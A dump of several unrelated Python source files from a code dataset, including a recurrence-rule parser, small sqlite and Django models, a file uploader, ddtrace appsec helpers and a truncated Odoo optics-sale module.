print rrule_repr(parse(expr))\n >>> rr('Wednesday 2am')\n rrule(HOURLY, byhour=2, byweekday=2)\n >>> rr('Wed 14:00')\n rrule(MINUTELY, byhour=14, byweekday=2)\n >>> rr('Wed(1)')\n rrule(WEEKLY, bysetpos=1, byweekday=2)\n >>> rr('5min')\n rrule(MINUTELY, interval=5)\n >>> rr('1 hour')\n rrule(HOURLY)\n >>> rr('1 hour 5 minute')\n rrule(MINUTELY, interval=65)\n >>> rr('1 day')\n rrule(DAILY)\n >>> rr('calendar day 1')\n rrule(MONTHLY, bymonthday=1)\n\"\"\"\n\nimport re\nimport datetime\nimport dateutil.relativedelta as rel\nfrom dateutil import rrule\n\ndays = 'monday|mon|mo|tuesday|tues|tue|tu|wednesday|wednseday|wednsday|wedsday|wedesday|wensday|wed|we|thursday|thurs|thur|thu|th|friday|frid|fri|fr|saturday|satur|sat|sa|sunday|sun|su'\nday_map = {\n 'mo': rel.MO, 'tu': rel.TU, 'we': rel.WE, 'th': rel.TH, 'fr': rel.FR, 'sa': rel.SA, 'su': rel.SU}\ndays_re = re.compile(days, re.I)\n\nday_spec = '('+days+')[(](-?[0-9]+)[)]'\nday_spec_re = re.compile(day_spec, re.I)\n\nunits = '([0-9]+)\\s*(seconds|second|secs|sec|minutes|minute|mins|min|hours|hour|days|day|weeks|week|months|month|years|year|yrs|yr)'\nunit_map = {\n 'se': rrule.SECONDLY,\n 'mi': rrule.MINUTELY,\n 'ho': rrule.HOURLY,\n 'da': rrule.DAILY,\n 'we': rrule.WEEKLY,\n 'mo': rrule.MONTHLY,\n 'ye': rrule.YEARLY,\n 'yr': rrule.YEARLY,\n }\nunits_re = re.compile(units, re.I)\n\nunit_trans = {\n (rrule.SECONDLY, rrule.MINUTELY): 60,\n (rrule.SECONDLY, rrule.HOURLY): 60*60,\n (rrule.SECONDLY, rrule.DAILY): 60*60*24,\n (rrule.SECONDLY, rrule.WEEKLY): 60*60*24*7,\n (rrule.SECONDLY, rrule.MONTHLY): 60*60*24*30,\n (rrule.SECONDLY, rrule.YEARLY): 60*60*24*365,\n (rrule.MINUTELY, rrule.HOURLY): 60,\n (rrule.MINUTELY, rrule.DAILY): 60*24,\n (rrule.MINUTELY, rrule.WEEKLY): 60*24*7,\n (rrule.MINUTELY, rrule.MONTHLY): 60*24*30,\n (rrule.MINUTELY, rrule.YEARLY): 60*24*365,\n (rrule.HOURLY, rrule.DAILY): 24,\n (rrule.HOURLY, rrule.WEEKLY): 24*7,\n (rrule.HOURLY, rrule.MONTHLY): 24*30,\n (rrule.HOURLY, rrule.YEARLY): 24*365,\n (rrule.DAILY, rrule.WEEKLY): 7,\n (rrule.DAILY, rrule.MONTHLY): 30,\n (rrule.DAILY, rrule.YEARLY): 365,\n (rrule.WEEKLY, rrule.MONTHLY): 4,\n (rrule.WEEKLY, rrule.YEARLY): 52,\n (rrule.MONTHLY, rrule.YEARLY): 12,\n }\n\ncalendar = 'cal[ea]nd[ea]r\\s+day\\s+([0-9]+)'\ncalendar_re = re.compile(calendar, re.I)\n\ntime = '([0-9]{1,2}):([0-9][0-9])(?::([0-9][0-9]))?(?:(am|pm))?'\ntime_re = re.compile(time, re.I)\n\nhour = '([0-9]{1,2})(am|pm)'\nhour_re = re.compile(hour, re.I)\n\ndef parse(expr):\n kw = {}\n kw['dtstart'] = datetime.datetime(1970, 1, 1, 0, 0, 0)\n while 1:\n expr = expr.strip()\n if not expr:\n break\n m = day_spec_re.search(expr)\n if m:\n day = day_map[m.group(1).lower()[:2]]\n spec = int(m.group(2))\n kw.setdefault('byweekday', []).append(day)\n kw['bysetpos'] = spec\n kw.setdefault('freq', rrule.WEEKLY)\n expr = expr[m.end():]\n continue\n m = days_re.search(expr)\n if m:\n day = day_map[m.group(0).lower()[:2]]\n kw.setdefault('byweekday', []).append(day)\n expr = expr[m.end():]\n continue\n m = units_re.search(expr)\n if m:\n v = int(m.group(1))\n unit = unit_map[m.group(2)[:2].lower()]\n if 'interval' in kw:\n old_unit = kw['freq']\n old_interval = kw['interval']\n if old_unit == unit:\n # Just add more time...\n v += old_interval\n elif (old_unit, unit) in unit_trans:\n # Turn new unit into old unit\n v *= unit_trans[(old_unit, unit)]\n unit = old_unit\n v += old_interval\n elif (unit, old_unit) in unit_trans:\n # Turn old unit into new unit\n old_interval *= unit_trans[(unit, old_unit)]\n v += old_interval\n 
else:\n raise ValueError(\n \"Cannot convert from unit %s to %s\" % (old_unit, unit))\n kw['freq'] = unit\n kw['interval'] = v\n expr = expr[m.end():]\n continue\n m = calendar_re.search(expr)\n if m:\n day = int(m.group(1))\n kw['bymonthday'] = day\n expr = expr[m.end():]\n kw.setdefault('freq', rrule.MONTHLY)\n continue\n m = time_re.search(expr)\n if m:\n hour = int(m.group(1))\n minute = int(m.group(2))\n if m.group(3):\n second = m.group(3)\n else:\n second = None\n if m.group(4):\n ampm = m.group(4).lower()\n if ampm == 'pm' and hour != 12:\n hour += 12\n elif ampm == 'am' and hour == 12:\n hour = 0\n kw['byhour'] = hour\n kw['byminute'] = minute\n if second is not None:\n kw['bysecond'] = second\n kw.setdefault('freq', rrule.MINUTELY)\n expr = expr[m.end():]\n continue\n m = hour_re.search(expr)\n if m:\n hour = int(m.group(1))\n ampm = m.group(2).lower()\n if ampm == 'pm' and hour != 12:\n hour += 12\n elif ampm == 'am' and hour == 12:\n hour = 0\n kw['byhour'] = hour\n kw.setdefault('freq', rrule.HOURLY)\n expr = expr[m.end():]\n continue\n raise ValueError(\n \"Cannot parse expression from: %r\" % expr)\n return rrule.rrule(**kw)\n\nfreq_map = {\n rrule.SECONDLY: 'SECONDLY',\n rrule.MINUTELY: 'MINUTELY',\n rrule.HOURLY: 'HOURLY',\n rrule.DAILY: 'DAILY',\n rrule.WEEKLY: 'WEEKLY',\n rrule.MONTHLY: 'MONTHLY',\n rrule.YEARLY: 'YEARLY',\n }\n\ndef rrule_repr(rule):\n values = []\n freq = freq_map[rule._freq]\n values.append(freq)\n # This defaults to now(), which means it must always be filled\n # in, which I don't like:\n # * _dtstart\n # * _timeset\n for attr in ['_byeaster', '_byhour', '_byminute', '_bymonth',\n '_bymonthday', '_bynmonthday', '_bynweekday',\n '_bysecond', '_bysetpos', '_byweekday', '_byweekno',\n '_byyearday', '_cache', '_count',\n '_interval',\n '_tzinfo', '_until', '_wkst']:\n val = getattr(rule, attr)\n if val is None or val == ():\n continue\n if isinstance(val, tuple) and len(val) == 1:\n val = val[0]\n if attr == '_interval' and val == 1:\n continue\n if attr == '_wkst' and val == 0:\n continue\n if attr in ('_byhour', '_byminute', '_bysecond') and val == 0:\n continue\n if attr.startswith('_'):\n attr = attr[1:]\n values.append('%s=%r' % (attr, val))\n return 'rrule(%s)' % ', '.join(values)\n \nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n \n","sub_path":"parsetime.py","file_name":"parsetime.py","file_ext":"py","file_size_in_byte":7230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"146274476","text":"n = int(input())\na = list(map(int,input().split()))\nf = list(range(n+1))\ndef fd(a):\n rt,tmp = a,a\n while f[rt]!=rt: rt = f[rt]\n while f[a]!=a:\n tmp = f[a]\n f[a] = rt\n a = tmp\n return rt\ndef un(a,b):\n ra,rb = fd(a),fd(b)\n if ra ==rb:return \n else: f[ra] = rb\nfor i in range(n):\n un(i+1,a[i])\nprint(sum(1 for i in range(1,n+1) if f[i]==i))\n","sub_path":"topics/Graph/CF_training/CF755C.py","file_name":"CF755C.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"609696867","text":"from django import forms\nfrom .models import Course\nfrom dal import autocomplete\n\n\nclass CourseForm(forms.ModelForm):\n class Meta:\n model = Course\n fields = ['course_title', 'playlist_id','categories']\n\n widgets = {\n 'created_by': forms.HiddenInput(),\n 'categories': autocomplete.ModelSelect2Multiple(url='category-autocomplete',\n attrs={'data-html': 'true',\n 'data-placeholder': 'Enter a 
category that this playlist falls into. You can add 2 categories too ...',\n 'data-minimum-input-length': 2,\n 'class': 'form-control'\n }),\n }\n help_texts = {\n 'course_title': '',\n 'playlist_id': 'Example: PLLnpHn493BHECNl9I8gwos-hEfFrer7TV from youtube playlist url &list=PLLnpHn493BHECNl9I8gwos-hEfFrer7TV'\n }","sub_path":"invana_university/courses/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"169902249","text":"from settings import settings\nimport logging\nimport sqlite3\nimport os\n\n# TODO: limit cache sizes\n\nCLEAN = 0\nDIRTY = 1\n\ndb = None\n\n\ndef initialize_database(db_filename):\n global db\n if db is not None:\n return\n is_db_new = not os.path.isfile(db_filename)\n db = sqlite3.connect(db_filename, check_same_thread=False)\n\n if is_db_new:\n logging.debug(\"No existing database found, creating database at %s\" % db_filename)\n for model in [CDN, Host]:\n for sql in model.schema:\n logging.debug(sql)\n db.execute(sql)\n db.commit()\n\n return db\n\n\ndef get_db():\n global db\n if db is None:\n initialize_database(settings['database'])\n return db\n\n\nclass CDN(object):\n schema = [\n \"create table cdn (id varchar(15) primary key, name varchar(20));\",\n \"create table cdn_ip (cdn varchar(15), ip varchar(15), primary key (cdn, ip));\"\n ]\n _cache = {}\n\n def __init__(self, id=None, name=None):\n self.id = id\n self.name = name\n self._addresses = None\n self._new = True\n\n def save(self):\n if self._new:\n db.execute('insert into cdn values (?, ?)', (self.id, self.name))\n self._new = False\n\n if self._addresses is not None:\n dirty_addresses = [addr for addr in self._addresses if self._addresses[addr] == DIRTY]\n if len(dirty_addresses) != 0:\n values = map(lambda addr: (\"('%s', '%s')\" % (self.id, addr)), dirty_addresses)\n for val in values:\n sql = \"insert into cdn_ip values %s;\" % val\n get_db().execute(sql)\n get_db().commit()\n\n def add_address(self, address):\n if self._addresses is None:\n self._addresses = {}\n if address in self._addresses:\n return\n self._addresses[address] = DIRTY\n\n def get_addresses(self):\n if self._addresses is None:\n cursor = db.execute(\"select ip from cdn_ip where cdn=?\", (self.id,))\n for addr in cursor.fetchall():\n if self._addresses is None:\n self._addresses = {}\n self._addresses[addr[0]] = CLEAN\n return self._addresses.keys()\n\n def __getattr__(self, item):\n if item == 'addresses':\n return self.get_addresses()\n\n @staticmethod\n def select():\n cursor = get_db().execute(\"select * from cdn\")\n items = cursor.fetchall()\n hosts = map(lambda item: CDN(id=item[0], name=item[1]), items)\n return list(hosts)\n\n @staticmethod\n def get(id):\n if id in CDN._cache:\n return CDN._cache[id]\n\n cursor = get_db().execute(\"select * from cdn where id=?\", (id,))\n item = cursor.fetchone()\n\n if item is None:\n raise CDN.DoesNotExist()\n\n cdn = CDN(id=item[0], name=item[1])\n cdn._new = False\n\n CDN._cache[id] = cdn\n return cdn\n\n @staticmethod\n def create(id, name, addresses=None):\n cdn = CDN(id=id, name=name)\n if addresses is not None:\n cdn._addresses = {}\n for address in addresses:\n cdn._addresses[address] = DIRTY\n cdn.save()\n return cdn\n\n class DoesNotExist(Exception):\n pass\n\n\nclass Host(object):\n schema = [\n \"create table hosts (url varchar(127) primary key, cdn varchar(15), ssl INTEGER default 0, foreign key (cdn) references cdn(id));\"\n ]\n _cache = {}\n\n 
def __init__(self, url=None, cdn=None, ssl=False):\n self.url = url\n self.ssl = ssl\n if type(cdn) == CDN:\n self._cdn = cdn.id\n else:\n self._cdn = cdn\n self._new = True\n\n def save(self):\n if self._new:\n get_db().execute('insert into hosts values (?, ?, ?)', (self.url, self._cdn, self.ssl))\n get_db().commit()\n self._new = False\n\n @staticmethod\n def select():\n cursor = get_db().execute(\"select * from hosts\")\n items = cursor.fetchall()\n hosts = map(lambda item: Host(url=item[0], cdn=item[1], ssl=item[2]), items)\n return list(hosts)\n\n @staticmethod\n def get(url):\n if url in Host._cache:\n return Host._cache[url]\n\n cursor = get_db().execute(\"select * from hosts where url=?\", (url,))\n item = cursor.fetchone()\n\n if item is None:\n raise Host.DoesNotExist()\n\n host = Host(url=item[0], cdn=item[1])\n host._new = False\n\n Host._cache[url] = host\n return host\n\n @staticmethod\n def create(url, cdn, ssl=False):\n host = Host(url=url, cdn=cdn, ssl=ssl)\n host.save()\n return host\n\n def _get_cdn(self):\n return CDN.get(self._cdn)\n\n def __getattr__(self, item):\n if item == 'cdn':\n return self._get_cdn()\n\n class DoesNotExist(Exception):\n pass\n","sub_path":"2/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"107777357","text":"\"\"\"\nAn item class to help load and export data to and from files (ie. csv)\n\"\"\"\n\nimport csv\nimport time\nimport json\nimport os\n\nfrom settings import UPLOADS_PATH\nimport lib.files\nfrom models.db import UploadDb, ItemDb\nfrom models.user import User\n\n\nclass Upload():\n \"\"\" An Item class used to load data from files and export data too files.\"\"\"\n\n def __init__(self, user_email=None):\n self.user = User(user_email)\n\n self.upload_db = UploadDb()\n self.item_db = ItemDb()\n self.errors = []\n self.ext = None #file extension\n self.format = None #file format csv or json\n self.name = None #file name from upload\n self.path = None #path the file was saved\n self.upload_id = None\n\n def save(self, byte_string, file_name):\n \n self.write_file(byte_string, file_name)\n\n self.format = lib.files.get_file_format(self.ext, self.path)\n\n self.upload_db.update_format(self.upload_id, self.format)\n \n if not self.errors:\n self.upload_db.update_status(self.upload_id, 'Loading data into Database.')\n n = 0\n if self.format == 'csv':\n n = self.load_csv_file()\n print('file was csv')\n elif self.format == 'json':\n n = self.load_json_file()\n print('file was json')\n else:\n self.errors.append('The format was not recognized.')\n\n if n == 0:\n self.errors.append('No rows found in file to upload.')\n\n if self.errors:\n self.upload_db.remove_record(self.upload_id)\n\n def write_file(self, byte_string, file_name, upload_dir=UPLOADS_PATH):\n \"\"\"\n Decode and save a byte_string to a specific path\n \"\"\"\n\n self.name = file_name\n self.ext = os.path.splitext(file_name)[1]\n self.path = os.path.join(upload_dir, file_name)\n\n self.upload_id = self.upload_db.create_record(self.name, \n self.path, self.user.email)\n\n f = open(self.path, 'w')\n\n try:\n file_content = byte_string.decode(\"cp1252\", \"ignore\")\n f.write(file_content)\n \n \n except UnicodeDecodeError:\n self.errors.append(\"A Unicode Decoding error occured. 
File was not uploaded.\")\n os.remove(self.path)\n\n \n f.close()\n\n\n def load_csv_file(self):\n \"\"\"\n Read items from a formatted csv file into the items collection\n \"\"\"\n f = open(self.path, 'rt')\n try:\n reader = csv.reader(f)\n keys = []\n n = 0\n\n for line in reader:\n if n == 0: #header line\n keys = line[:]\n keys = [x.replace('.', '') for x in keys]\n else:\n item = dict(zip(keys, line))\n self.insert_item(item)\n n += 1\n num_items_loaded = n - 1\n return num_items_loaded\n\n except Exception as e:\n self.errors.append(\"Import had an error!\" + str(e))\n\n finally:\n f.close()\n\n \n\n\n def load_json_file(self):\n \"\"\"\n Read items from a formatted JSON file into the items collection\n \"\"\"\n print('LOADING json file.')\n f = open(self.path, \"rt\")\n items = json.loads(f.read())\n for item in items:\n print(item)\n self.insert_item(item)\n f.close()\n num_items_loaded = len(items)\n return num_items_loaded\n\n\n def insert_item(self, item):\n \"\"\" \n Accept an item as a dictionary, clean it to the formatting standard\n then attach the source upload_id and user.id to the item before\n saving the item. \n \"\"\"\n\n item = self.clean_item(item)\n #insert the item into the items collection\n item_id = self.item_db.insert_row(item, self.user.id, self.upload_id)\n\n return item_id\n\n\n def clean_item(self, item):\n \"\"\" \n Perform the basic formatting functions on keys and values of items\n so there will be no errors in the database. \n \"\"\"\n\n reserved_keys = ['_id', 'sku', 'isbn']\n\n cleaned = {}\n for k, v in item.items():\n\n if k not in reserved_keys:\n #update property names\n\n k = lib.text.replace_characters(k, char_dict={'.':' '})\n k = lib.text.capitalize_first_letter(k)\n\n #update values\n v = lib.text.replace_characters(v, char_dict={'\"':'in'})\n \n #remove all leading and trailing spaces for all keys and values\n k = lib.text.strip_all(k, [' ', ','])\n v = lib.text.strip_all(v, [' ', ','])\n\n if v and k:\n cleaned[k] = v\n\n return cleaned\n","sub_path":"models/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":4911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"265649728","text":"#decrypting the file\r\nfrom cryptography.fernet import Fernet\r\nimport os\r\nwith open (\"key.key\", \"r\") as fkey:\r\n key = fkey.read()\r\n print(key)\r\n \r\ninputfile = \"properties_encrypted.conf\"\r\noutputfile = \"properties.conf\"\r\n\r\nwith open(inputfile, 'rb') as f:\r\n data = f.read()\r\n \r\n \r\nfernet = Fernet(key)\r\ndecrypted = fernet.decrypt(data)\r\n\r\nwith open(outputfile, 'wb') as f:\r\n f.write(decrypted)\r\n\r\n","sub_path":"decrypted01.py","file_name":"decrypted01.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"149207359","text":"import requests, csv, os\r\n\r\n#HTTP/1.1 302 Found\r\nRecID = 0\r\nfilesmain= open('link_list.txt','a')\r\n#writer = csv.writer(filesmain) \r\nfilessecond= open('not_posible.txt','a')\r\nstatusneeded= 200\r\n\r\nheader=['url','name']\r\ncsv.register_dialect(\r\n 'wwwdialec',\r\n delimiter = \"'\",\r\n\r\n )\r\n#url = \"https://ucpi.sco.ca.gov/ucp/PropertyDetails.aspx\"\n#squery =\n#connection to website where query string is variable. 
If connection is possible add to arrays\n#If http code is ok \n# add URL to list usable \n#else \n# range for use 1, 5*10**6 \n# add list not usable \nfor RecID in range(1,30):\n value={'propertyRecID': RecID }\n connection=requests.get('https://ucpi.sco.ca.gov/ucp/PropertyDetails.aspx',params=value, allow_redirects=False, timeout=1)\n print(RecID)\n if connection.status_code == statusneeded:\n filesmain.write(connection.url+'\\n')\n else:\n filessecond.write(connection.url+'\\n')\nfilessecond.close()\nfilesmain.close()\n \n\n\n\n\n ","sub_path":"python/webcrawlertest/websitestester.py","file_name":"websitestester.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"39653901","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import signal\n\nplt.subplot(421)\nt = np.arange(10)\nx = signal.square(t,duty = 0.5)\nplt.plot(t,x)\n\nplt.subplot(422)\nt = np.arange(10)\nh1 = np.sin(t)\nplt.plot(t,h1)\n\nplt.subplot(423)\nt = np.arange(10)\nh2 = np.cos(t)\nplt.plot(t,h2)\n\nplt.subplot(424)\nt = np.arange(19)\nplt.plot(t,np.convolve(x,h1))\n\nplt.subplot(425)\nt = np.arange(28)\nplt.plot(t,np.convolve(np.convolve(x,h1),h2))\n\nplt.subplot(426)\nt = np.arange(28)\nplt.plot(t,np.convolve(x,np.convolve(h1,h2)))\n\n\n\nplt.show()","sub_path":"series_connection.py","file_name":"series_connection.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"36162944","text":"import base64\nimport os\nimport sys\nfrom typing import TYPE_CHECKING\n\nfrom ddtrace.appsec import _asm_request_context\nfrom ddtrace.appsec._constants import API_SECURITY\nfrom ddtrace.constants import APPSEC_ENV\nfrom ddtrace.internal.compat import parse\nfrom ddtrace.internal.compat import to_bytes_py2\nfrom ddtrace.internal.logger import get_logger\nfrom ddtrace.internal.utils.formats import asbool\nfrom ddtrace.internal.utils.http import _get_blocked_template # noqa\n\n\nif TYPE_CHECKING: # pragma: no cover\n from typing import Any\n from typing import Optional\n\n from ddtrace import Tracer\n from ddtrace.internal.compat import text_type as unicode\n\n\nlog = get_logger(__name__)\n\n\ndef _appsec_rc_features_is_enabled():\n # type: () -> bool\n if asbool(os.environ.get(\"DD_REMOTE_CONFIGURATION_ENABLED\", \"true\")):\n return APPSEC_ENV not in os.environ\n return False\n\n\ndef _appsec_rc_file_is_not_static():\n return \"DD_APPSEC_RULES\" not in os.environ\n\n\ndef _appsec_rc_capabilities(test_tracer=None):\n # type: (Optional[Tracer]) -> str\n r\"\"\"return the bit representation of the composed capabilities in base64\n bit 0: Reserved\n bit 1: ASM 1-click Activation\n bit 2: ASM Ip blocking\n\n Int Number -> binary number -> bytes representation -> base64 representation\n ASM Activation:\n 2 -> 10 -> b'\\x02' -> \"Ag==\"\n ASM Ip blocking:\n 4 -> 100 -> b'\\x04' -> \"BA==\"\n ASM Activation and ASM Ip blocking:\n 6 -> 110 -> b'\\x06' -> \"Bg==\"\n ...\n 256 -> 100000000 -> b'\\x01\\x00' -> b'AQA='\n \"\"\"\n if test_tracer is None:\n from ddtrace import tracer\n else:\n tracer = test_tracer\n\n value = 0b0\n result = \"\"\n if asbool(os.environ.get(\"DD_REMOTE_CONFIGURATION_ENABLED\", \"true\")):\n if _appsec_rc_features_is_enabled():\n value |= 1 << 1 # Enable ASM_ACTIVATION\n if tracer._appsec_processor and _appsec_rc_file_is_not_static():\n value |= 1 << 2 # Enable ASM_IP_BLOCKING\n value |= 1 << 3 # Enable 
ASM_DD_RULES\n value |= 1 << 4 # Enable ASM_EXCLUSIONS\n value |= 1 << 5 # Enable ASM_REQUEST_BLOCKING\n value |= 1 << 6 # Enable ASM_ASM_RESPONSE_BLOCKING\n value |= 1 << 7 # Enable ASM_USER_BLOCKING\n value |= 1 << 8 # Enable ASM_CUSTOM_RULES\n\n if sys.version_info.major < 3:\n bytes_res = to_bytes_py2(value, (value.bit_length() + 7) // 8, \"big\")\n # \"type: ignore\" because mypy does not notice this is for Python2 b64encode\n result = str(base64.b64encode(bytes_res)) # type: ignore\n else:\n result = str(base64.b64encode(value.to_bytes((value.bit_length() + 7) // 8, \"big\")), encoding=\"utf-8\")\n\n return result\n\n\ndef parse_form_params(body):\n # type: (unicode) -> dict[unicode, unicode|list[unicode]]\n \"\"\"Return a dict of form data after HTTP form parsing\"\"\"\n body_params = body.replace(\"+\", \" \")\n req_body = dict() # type: dict[unicode, unicode|list[unicode]]\n for item in body_params.split(\"&\"):\n key, equal, val = item.partition(\"=\")\n if equal:\n key = parse.unquote(key)\n val = parse.unquote(val)\n prev_value = req_body.get(key, None)\n if prev_value is None:\n req_body[key] = val\n elif isinstance(prev_value, list):\n prev_value.append(val)\n else:\n req_body[key] = [prev_value, val]\n return req_body\n\n\ndef parse_form_multipart(body):\n # type: (unicode) -> dict[unicode, Any]\n \"\"\"Return a dict of form data after HTTP form parsing\"\"\"\n import email\n import json\n\n import xmltodict\n\n def parse_message(msg):\n if msg.is_multipart():\n res = {\n part.get_param(\"name\", failobj=part.get_filename(), header=\"content-disposition\"): parse_message(part)\n for part in msg.get_payload()\n }\n else:\n content_type = msg.get(\"Content-Type\")\n if content_type in (\"application/json\", \"text/json\"):\n res = json.loads(msg.get_payload())\n elif content_type in (\"application/xml\", \"text/xml\"):\n res = xmltodict.parse(msg.get_payload())\n elif content_type in (\"text/plain\", None):\n res = msg.get_payload()\n else:\n res = \"\"\n\n return res\n\n headers = _asm_request_context.get_headers()\n if headers is not None:\n content_type = headers.get(\"Content-Type\")\n msg = email.message_from_string(\"MIME-Version: 1.0\\nContent-Type: %s\\n%s\" % (content_type, body))\n return parse_message(msg)\n return {}\n\n\ndef parse_response_body(raw_body):\n import json\n\n import xmltodict\n\n from ddtrace.appsec._constants import SPAN_DATA_NAMES\n from ddtrace.contrib.trace_utils import _get_header_value_case_insensitive\n\n if not raw_body:\n return\n\n if isinstance(raw_body, dict):\n return raw_body\n\n headers = _asm_request_context.get_waf_address(SPAN_DATA_NAMES.RESPONSE_HEADERS_NO_COOKIES)\n if not headers:\n return\n content_type = _get_header_value_case_insensitive(\n dict(headers),\n \"content-type\",\n )\n if not content_type:\n return\n\n def access_body(bd):\n if isinstance(bd, list) and isinstance(bd[0], (str, bytes)):\n bd = bd[0][:0].join(bd)\n if getattr(bd, \"decode\", False):\n bd = bd.decode(\"UTF-8\", errors=\"ignore\")\n if len(bd) >= API_SECURITY.MAX_PAYLOAD_SIZE:\n raise ValueError(\"response body larger than 16MB\")\n return bd\n\n req_body = None\n try:\n # TODO handle charset\n if \"json\" in content_type:\n req_body = json.loads(access_body(raw_body))\n elif \"xml\" in content_type:\n req_body = xmltodict.parse(access_body(raw_body))\n else:\n return\n except BaseException:\n log.debug(\"Failed to parse response body\", exc_info=True)\n else:\n return 
req_body\n","sub_path":"ddtrace/appsec/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"11005883","text":"from openerp import api\nfrom openerp.exceptions import ValidationError\nfrom openerp.osv import fields, osv\nfrom openerp.tools.translate import _\nfrom datetime import date, time, timedelta, datetime\n\n\nclass optics_sale(osv.osv):\n _name = \"optics.sale\"\n _order = 'id desc'\n\n def _totalpayable(self, cr, uid, ids, field_name, arg, context=None):\n Percentance_calculation = {}\n sum = 0\n for items in self.pool.get(\"optics.sale\").browse(cr, uid, ids, context=None):\n total_list = []\n for amount in items.optics_sale_line_id:\n total_list.append(amount.total_amount)\n for item in total_list:\n sum = item + sum\n for record in self.browse(cr, uid, ids, context=context):\n Percentance_calculation[record.id] = sum\n return Percentance_calculation\n\n def _default_payment_type(self):\n return self.env['payment.type'].search([('name', '=', 'Cash')], limit=1).id\n\n\n _columns = {\n # 'patient_id': fields.char(\"Patient ID\"),\n 'name': fields.char(\"Name\"),\n 'mobile': fields.char(string=\"Mobile\", readonly=True, store=False),\n 'patient_id': fields.char(related='patient_name.patient_id', string=\"Patient Id\", readonly=True),\n 'patient_name': fields.many2one('patient.info', \"Patient Name\", required=True, placeholder='Full Name'),\n 'address': fields.char(\"Address\", store=False, placeholder='Address'),\n 'age': fields.char(\"Age\", store=False),\n 'sex': fields.char(\"Sex\", store=False),\n 'right_eye_sph': fields.char('Right Eye SPH'),\n 'right_eye_cyl': fields.char('Right Eye CYL'),\n 'right_eye_axis': fields.char('Right Eye AXIS'),\n 'right_eye_sph_n': fields.char('Right Eye SPH -N'),\n 'right_eye_cyl_n': fields.char('Right Eye CYL -N'),\n 'right_eye_axis_n': fields.char('Right Eye AXIS -N'),\n 'left_eye_sph': fields.char('Left Eye SPH'),\n 'left_eye_cyl': fields.char('Left Eye CYL'),\n 'left_eye_axis': fields.char('Left Eye AXIS'),\n 'left_eye_sph_n': fields.char('Left Eye SPH -N'),\n 'left_eye_cyl_n': fields.char('Left Eye CYL -N'),\n 'left_eye_axis_n': fields.char('Left Eye AXIS -N'),\n 'delivery_date': fields.date(string=\"Delivery Date\"),\n 'hard_cover': fields.boolean(\"Cover\", default=True),\n 'cell_pad': fields.boolean(\"Cell Pad\", default=True),\n 'frame_id': fields.many2one('product.product', 'Frame'),\n 'quantity':fields.integer('Quantity'),\n 'qty_available':fields.integer(\"Stock Quantity\", readonly=True),\n 'delivery_id': fields.many2one('stock.picking', 'Delivery Challan'),\n 'price': fields.float('Price'),\n 'optics_lens_sale_line_id': fields.one2many('optics.lens.sale.line', 'optics_sale_id', 'Lens Entry'),\n 'optics_sale_payment_line_id': fields.one2many(\"optics.sale.payment.line\", \"optics_sale_payment_line_id\",\n \"Bill Register Payment\"),\n # 'footer_connection': fields.one2many('leih.footer', 'relation', 'Parameters', required=True),\n # 'relation': fields.many2one(\"leih.investigation\"),\n # 'total': fields.float(_totalpayable,string=\"Total\",type='float',store=True),\n 'total': fields.float(string=\"Total\"),\n 'doctors_discounts': fields.float(\"Discount(%)\"),\n 'after_discount': fields.float(\"Discount Amount\"),\n 'other_discount': fields.float(\"Other Discount\"),\n 'grand_total': fields.float(\"Grand Total\"),\n 'paid': fields.float(string=\"Paid\", required=True),\n 'type': fields.selection([('cash', 
'Cash'), ('bank', 'Bank')], 'Payment Type'),\n 'card_no': fields.char('Card No.'),\n 'bank_name': fields.char('Bank Name'),\n 'due': fields.float(\"Due\"),\n 'date': fields.datetime(\"Date\", readonly=True, default=lambda self: fields.datetime.now()),\n 'state': fields.selection(\n [('pending', 'Pending'), ('confirmed', 'Confirmed'), ('cancelled', 'Cancelled')],\n 'Status', default='pending', readonly=True),\n # payment type attributes\n 'payment_type': fields.many2one(\"payment.type\", \"Payment Type\", default=_default_payment_type),\n 'service_charge': fields.float(\"Service Charge\"),\n 'to_be_paid': fields.float(\"To be Paid\"),\n 'account_number': fields.char(\"Account Number\")\n }\n\n _defaults = {\n 'quantity': 1\n }\n\n @api.onchange(\"payment_type\")\n def onchnage_payment_type(self):\n if self.payment_type.active==True:\n interest=self.payment_type.service_charge\n if interest>0:\n service_charge=(self.paid*interest)/100\n self.service_charge=service_charge\n self.to_be_paid=self.paid+service_charge\n else:\n self.to_be_paid=self.paid\n self.service_charge=0\n return \"X\"\n\n def onchange_quantity(self, cr, uid, ids, quantity,frame_id, context=None):\n tests = {'values': {}}\n import pdb\n pdb.set_trace()\n\n unit_price = frame_id.list_price\n total_price = unit_price * quantity\n\n abc = {'price': total_price}\n tests['value'] = abc\n #\n\n return tests\n\n @api.onchange('quantity')\n def onchange_frame_bill_qty(self):\n frame_code = self.frame_id\n self.price = frame_code.list_price * self.quantity\n return 'X'\n\n\n\n\n # if same item exist in line\n def bill_confirm(self, cr, uid, ids, context=None):\n stored_obj = self.browse(cr, uid, [ids[0]], context=context)\n ## Bill Status Will Change\n stored = int(ids[0])\n if stored_obj.state == 'confirmed':\n raise osv.except_osv(_('Warning!'),\n _('Already it is Confirmed. 
